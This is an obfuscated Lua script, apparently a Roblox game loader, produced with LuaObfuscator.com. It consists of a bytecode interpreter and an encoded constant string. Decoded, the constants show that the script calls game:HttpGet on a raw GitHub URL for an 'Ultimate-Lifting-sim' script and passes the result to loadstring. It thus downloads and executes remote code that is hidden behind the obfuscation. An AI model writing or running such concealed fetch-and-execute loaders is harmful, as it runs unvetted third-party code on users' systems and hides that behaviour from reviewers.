--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v91=v5(v83,v19);v19=nil;return v91;else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%(((1640 -(1523 + 114)) -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + 201))) ;else local v85=(929 -(193 + 21 + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21() local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + (1066 -((1025 -(892 + 65)) + 997)) ;v34=(2 -1) + (0 -0) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;return (v37 * (606 -(87 + 263))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + ((727 -544) -(67 + 113)) );v18=v18 + 3 + 1 ;return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * 256) + v38 ;end local function v24() local v42=952 -(802 + 150) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(2 -(1 + 0))) then v45=(773 -(201 + 571)) -0 ;v46=(v20(v44,(1139 -(116 + 1022)) + (0 -0) ,20) * (((587 + 412) -(915 + (299 -217)))^(90 -58))) + v43 ;v42=2 + 0 ;end if (v42==(3 -0)) then if (v47==0) then if (v46==(1187 -(1069 + 118))) then return v48 * (0 -0) ;else v47=1;v45=0 -0 ;end elseif (v47==(356 + 1691)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(791 -(368 + 423))))) or (v48 * NaN) ;end return v8(v48,v47-(3214 -(7780 -5589)) ) * (v45 + (v46/((20 -(10 + 8))^52))) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=(1302 -(814 + 45)) -(416 + 26) ;end if (v42==((14 -8) -4)) then v47=v20(v44,10 + 1 + 10 ,54 -23 );v48=((v20(v44,470 -(52 + 93 + 293) )==(431 -(44 + (1271 -(261 + 624))))) and  -(1487 -(998 + 488))) or 1 ;v42=1 + 2 ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1423 -(630 + 793))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;local v51={};for v66=1081 -(1020 + 60) , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v52~=(1 + 0)) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v52=(function() return 4 -2 ;end)();end if (v52~=(0 + 0)) then else local v89=(function() return 0 -0 ;end)();while true do if (v89~=0) then else v53=(function() return function(v109,v110,v111) local v112=(function() return 0;end)();while true do if (v112~=0) then else v109[v110-#"," ]=(function() return v111();end)();return v109,v110,v111;end end end;end)();v54=(function() return {};end)();v89=(function() return 1 -0 ;end)();end if (v89~=1) then else v55=(function() return {};end)();v52=(function() return 1;end)();break;end end end if (v52==(7 -5)) then local v90=(function() return 867 -(550 + 317) ;end)();while true do if (v90~=(1 + 0)) then else v57[ #"19("]=(function() return v21();end)();v52=(function() return 3 -0 ;end)();break;end if (v90==0) then v59=(function() return {};end)();for v105= #",",v58 do local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v106~=1) then else if (v107== #">") then v108=(function() return v21()~=(0 -0) ;end)();elseif (v107==(5 -3)) then v108=(function() return v24();end)();elseif (v107~= #"nil") then else v108=(function() return v25();end)();end v59[v105]=(function() return v108;end)();break;end if (v106~=(290 -(60 + 230))) then else local v116=(function() return 285 -(134 + 151) ;end)();while true do if (v116==(1 + 0)) then v106=(function() return 1457 -(282 + 1174) ;end)();break;end if (v116~=0) then else v107=(function() return v21();end)();v108=(function() return nil;end)();v116=(function() return 1666 -(970 + 695) ;end)();end end end end end v90=(function() return 1;end)();end end end if ((8 -5)~=v52) then else for v92= #",",v23() do local v93=(function() return v21();end)();if (v20(v93, #"!", #"|")==(0 -0)) then local v100=(function() return 1990 -(582 + 1408) ;end)();local v101=(function() return;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v100~=1) then else local v113=(function() return 0;end)();local v114=(function() return;end)();while true do if (v113~=(0 -0)) then else v114=(function() return 0 -0 ;end)();while true do if (v114==(0 -0)) then v103=(function() return nil;end)();v104=(function() return nil;end)();v114=(function() return 1;end)();end if (v114~=1) then else v100=(function() return 2;end)();break;end end break;end end end if (v100==(1826 -(1195 + 629))) then while true do if (v101~=(2 -0)) then else local v156=(function() return 241 -(187 + 54) ;end)();local v157=(function() return;end)();while true do if (v156==0) then v157=(function() return 780 -(162 + 618) ;end)();while true do if (v157==1) then v101=(function() return  #"-19";end)();break;end if (v157~=(700 -(271 + 429))) then else if (v20(v103, #"|", #":")== #" ") then v104[2]=(function() return v59[v104[2]];end)();end if (v20(v103,2 + 0 ,2)== #"|") then v104[ #"xxx"]=(function() return v59[v104[ #"91("]];end)();end v157=(function() return 1 + 0 ;end)();end end break;end end end if (v101~=0) then else local v158=(function() return 1500 -(1408 + 92) ;end)();local v159=(function() return;end)();while true do if (v158==(0 -0)) then v159=(function() return 0 -0 ;end)();while true do if (v159==1) then v101=(function() return  #" ";end)();break;end if (v159~=(0 + 0)) then else v102=(function() return v20(v93,1173 -(418 + 753) , #"91(");end)();v103=(function() return v20(v93, #"xnxx",1642 -(1373 + 263) );end)();v159=(function() return 1001 -(451 + 549) ;end)();end end break;end end end if (v101~= #"]") then else local v160=(function() return 0 + 0 ;end)();local v161=(function() return;end)();while true do if (v160~=(0 + 0)) then else v161=(function() return 0;end)();while true do if (v161~=(0 + 0)) then else v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==(529 -(406 + 123))) then local v166=(function() return 0 -0 ;end)();local v167=(function() return;end)();while true do if (0~=v166) then else v167=(function() return 0 -0 ;end)();while true do if ((1384 -(746 + 638))~=v167) then else v104[ #"xnx"]=(function() return v22();end)();v104[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v102== #" ") then v104[ #"gha"]=(function() return v23();end)();elseif (v102==(1324 -(1249 + 73))) then v104[ #"nil"]=(function() return v23() -(2^(7 + 9)) ;end)();elseif (v102~= #"xnx") then else local v172=(function() return 0;end)();while true do if (0~=v172) then else v104[ #"nil"]=(function() return v23() -(2^16) ;end)();v104[ #"0836"]=(function() return v22();end)();break;end end end v161=(function() return 1 -0 ;end)();end if (v161==(342 -(218 + 123))) then v101=(function() return 2;end)();break;end end break;end end end if (v101== #"91(") then if (v20(v103, #"19(", #"19(")~= #",") then else v104[ #"http"]=(function() return v59[v104[ #"0313"]];end)();end v54[v92]=(function() return v104;end)();break;end end break;end if (v100~=(1581 -(1535 + 46))) then else v101=(function() return 0 + 0 ;end)();v102=(function() return nil;end)();v100=(function() return 1901 -(106 + 1794) ;end)();end end end end for v94= #">",v23() do v55,v94,v28=(function() return v53(v55,v94,v28);end)();end return v57;end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1 + 1 ];local v65=v60[8 -5 ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=2 -1 ;local v73= -((67 + 48) -(4 + 110));local v74={};local v75={...};local v76=v12("#",...) -(1428 -(41 + 1386)) ;local v77={};local v78={};for v86=103 -(17 + 86) ,v76 do if ((1284<=3151) and (v86>=v70)) then v74[v86-v70 ]=v75[v86 + 1 + 0 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + (1 -0) ;local v80;local v81;while true do v80=v68[v72];v81=v80[2 -(1 + 0) ];if (v81<=((374 -201) -(122 + 44))) then if ((v81<=(5 -2)) or (1850==1529)) then if ((821<2123) and (v81<=(3 -2))) then if (v81==(0 + 0)) then v78[v80[2]]=v80[(978 -(553 + 424)) + 2 ];else v78[v80[2]]();end elseif ((902<2325) and (v81>2)) then v78[v80[(7 -4) -1 ]]=v62[v80[68 -(30 + 35) ]];else do return;end end elseif (v81<=(4 + 1)) then if (v81>(1261 -(1043 + 214))) then v78[v80[7 -(11 -6) ]]={};else local v122=v80[1214 -(323 + 889) ];local v123=v78[v80[3]];v78[v122 + (2 -(1 + 0)) ]=v123;v78[v122]=v123[v80[(2822 -2238) -(361 + 219) ]];end elseif ((858<=2962) and (v81==(326 -(53 + (1020 -(239 + 514)))))) then v78[v80[1 + 1 ]]=v80[416 -(15 + 398) ];else local v129=v80[(346 + 638) -(18 + 964) ];v78[v129]=v78[v129](v13(v78,v129 + (3 -(1331 -(797 + 532))) ,v73));end elseif (v81<=11) then if (v81<=(6 + 3)) then if (v81==(6 + 2)) then do return;end else local v131=v80[852 -(20 + 830) ];v78[v131]=v78[v131](v13(v78,v131 + 1 + 0 ,v73));end elseif (v81>(136 -(116 + 10))) then local v133=v80[1 + 1 ];local v134=v78[v80[741 -(542 + 196) ]];v78[v133 + (1 -0) ]=v134;v78[v133]=v134[v80[2 + 2 + 0 ]];else local v138=v80[2 + 0 ];local v139,v140=v71(v78[v138](v13(v78,v138 + (1 -0) + 0 ,v80[7 -4 ])));v73=(v140 + v138) -(2 -1) ;local v141=0;for v150=v138,v73 do v141=v141 + (1552 -(1126 + 425)) ;v78[v150]=v139[v141];end end elseif ((v81<=(418 -(118 + 287))) or (3946<1288)) then if ((v81==(46 -34)) or (3242==567)) then local v142=v80[2 + 0 ];local v143,v144=v71(v78[v142](v13(v78,v142 + 1 ,v80[3 + 0 ])));v73=(v144 + v142) -(1122 -(118 + 1003)) ;local v145=0 -0 ;for v153=v142,v73 do v145=v145 + 1 ;v78[v153]=v143[v145];end else v78[v80[1204 -(373 + 829) ]]=v62[v80[8 -5 ]];end elseif (v81>((1122 -(476 + 255)) -(142 + 235))) then v78[v80[2]]();else v78[v80[(1139 -(369 + 761)) -7 ]]={};end v72=v72 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403523Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F71417841702F556C74696D6174652D4C696674696E672D73696D2F726566732F68656164732F6D61696E2F737573686900094Q00057Q00120D000100013Q00120D000200023Q00200400020002000300122Q000400044Q000A000200044Q000700013Q00022Q000F0001000100012Q00083Q00017Q00",v9(),...);
